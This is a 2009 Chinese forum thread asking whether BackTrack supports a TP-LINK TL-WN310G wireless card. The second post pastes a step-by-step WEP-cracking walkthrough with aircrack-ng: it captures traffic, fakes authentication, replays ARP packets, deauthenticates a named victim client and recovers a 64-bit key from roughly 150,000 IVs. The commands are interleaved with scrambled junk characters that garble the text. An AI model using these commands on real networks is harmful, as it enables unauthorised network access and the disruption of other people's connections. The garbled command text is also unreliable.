ubnt解决方案
查看: 3706|回复: 4

BT3支持TL-WN310G吗?

[复制链接]

24

回帖

60

积分

16 小时

在线时间

上等兵

注册时间
2009-2-9
金币
30 个
威望
0 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-14 17:14 |显示全部楼层
如题,谢谢。或者bt4?不知道这个卡是什么芯片的

24

回帖

60

积分

16 小时

在线时间

上等兵

注册时间
2009-2-9
金币
30 个
威望
0 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-14 17:41 |显示全部楼层
这是自己从网上找到的,回去测试一下了,回来给大家报告……. P% k+ X) t( J9 P' v( G
+ F( h4 y4 f4 l: r9 A" V
测试环境:4 A8 K' W! \/ m8 ~& t
D-LINK DL-624+A,TP-LINK TL-WN310G,Dell LATITUDE D510,BackTrack 1.0/ n2 G' w9 ?. _5 C3 @: |
AP的MAC  00:14:E3:EA:72:92( c+ f3 _* J1 [0 C' j: B! C
攻击者的MAC 00:15:E4:13:9A:98) ^9 I0 Z- g% Q
受害者的MAC 00:15:E3:EA:82:621 Z# @" z* i% E0 B% r
一个Aircrack-ng可以完成所有工作
# m3 U5 o; c! @5 W- `+ h- v
# t% }% b$ q  b' o% N1.# airodump-ng -w x ath0
" z  |# y: M) K9 k; S. I可以看到当前所有探测到的AP以及客户端) H1 ^! u1 C# k2 @
* z5 ]  Q. A( ]8 x
2.# airodump-ng -c 10 –ivs -w x ath09 ]6 Q. w) {9 a( l$ @9 e: K
选择特定channel
$ d- J* c: e( ]/ V7 t2 Y8 y选择值记录ivs包
, x. U  l3 f- ?6 J. U
  K$ z1 E# I+ @( r9 _! r3.# airreplay-ng –fakeauth 0 -e “default” -a 00:14:E3:EA:72:92 -h 00:15:E4:13:9A:98 ath0
4 H, c5 g. C) Q- U8 R: [  # airreplay-ng –fakeauth 0 -e “ESSID” -a BSSID -h LocalMAC WLANInterface
' w  \* h7 _+ ~  显示successful证明网卡支持Inject( }3 k/ M4 E2 A1 e: |$ P

0 w# z6 I- g. i- Q. o4.# airreplay-ng –arpreplay -b 00:14:E3:EA:72:92 -h 00:15:E3:EA:82:62 ath0. Y) c0 c+ Q, s! I9 ~
  # airreplay-ng –arpreplay -r xxxxx.cap -b 00:14:E3:EA:72:92 -h 00:15:E3:EA:82:62 ath0
7 t1 U' t& c# k  # airreplay-ng Attackmode -b BSSID -h VictimMAC WLANInterface, q* Q+ b7 ?0 I9 b( s( i/ a; \1 X
( a: }$ s+ a  ~' K
VictimMAC可以从airodump-ng里获得,必须是那些已经ASSCO协商成功的客户端
2 l, X8 D5 `" B% u( B( o* c一旦airreplay-ng抓到ARP包,就会开始伪造发送,加快airodump-ng的抓包过程
" X) X3 k( Y$ k7 ^3 C* n# W但是已经连接好的客户端一般不会频繁的发送ARP包,所以需要–deauth攻击来触发
0 I$ ^& \! g) L: n) @5 t7 c# _( L5 Q! C( b, Q
5.# airreplay-ng –deauth 5 -a 00:14:E3:EA:72:92 -c 00:15:E3:EA:82:62 ath0
/ I; T5 Y5 O# u2 D% u  # airreplay-ng Attackmode -a BSSID -c VictimMAC WLANInterface
4 R7 k, r+ S/ H) T6 e9 [. Z, Y( U0 I* b# c: t) _
触发Victim重新跟AP进行ARP解析; A, M0 A: Y3 _1 X, f7 o
可能需要多次才能正确捕获到包, ]6 i( a; f0 |0 P7 d$ l

7 D$ Y5 _0 o$ e# g  e; y7 o4 X6.一般64 bit的密钥150000左右个IVS就可以破解了% c+ C" y1 w5 ]. Q& U" ^
当然,IVS获得个数越多越好
回复

使用道具 举报

17

回帖

51

积分

16 小时

在线时间

新兵上阵

注册时间
2009-5-3
金币
28 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-4 11:43 |显示全部楼层
我也要知道呀
回复

使用道具 举报

13

回帖

56

积分

48 小时

在线时间

上等兵

注册时间
2009-2-11
金币
35 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-18 14:16 |显示全部楼层
完美支持.........
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-8-20 15:38 |显示全部楼层
modprobe ipwraw替换成modprobe ipw3945
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-6-18 00:42

返回顶部 返回列表